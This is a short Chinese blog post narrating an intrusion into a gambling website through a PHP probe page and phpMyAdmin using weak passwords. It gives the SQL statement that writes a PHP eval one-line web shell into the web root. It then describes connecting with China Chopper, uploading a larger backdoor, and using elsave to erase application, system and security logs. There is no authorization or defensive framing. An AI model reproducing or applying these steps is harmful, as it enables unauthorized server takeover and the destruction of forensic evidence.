phpmyadmin拿网站shell

开门见山

 

1. 找到一个赌博网站,发现存在php探针界面,在下面输入密码尝试用弱口令进行连接,尝试是否成功

 

 

 

失败的结果是这样。

 

 

 

2. 成功!

 

 

 

3. 连接成功的,点击phpMyAdmin管理,进行弱口令登陆,登陆成功了

 

 

 

4. 使用刚才尝试的弱口令进行登陆

 

 

 

6. 成功进入到管理后台中。

 

 

 

7. 执行sql语句,进行插入一句话木马: ( SELECT '<?php @eval($_POST[xxx]);?>'  INTO OUTFILE  'D:/UPUPW_AP5.2/htdocs/xxx.php'

 

 

 

8. 目录路径为这个

 

 

 

9. 点击执行,执行成功

 

 

 

10. 使用中国菜刀对一句话进行连接

 

 

 

11. 连接成功

 

 

 

12. 之后上传大马后门

 

 

 

 

 

最后测试完成后,删除大马后门,删除日志

elsave -l 日志类型 -C application应用程序日志,system系统日志,security安全日志)

 

 

posted @ 2020-02-05 20:29  joker0xxx3  阅读(382)  评论(0编辑  收藏  举报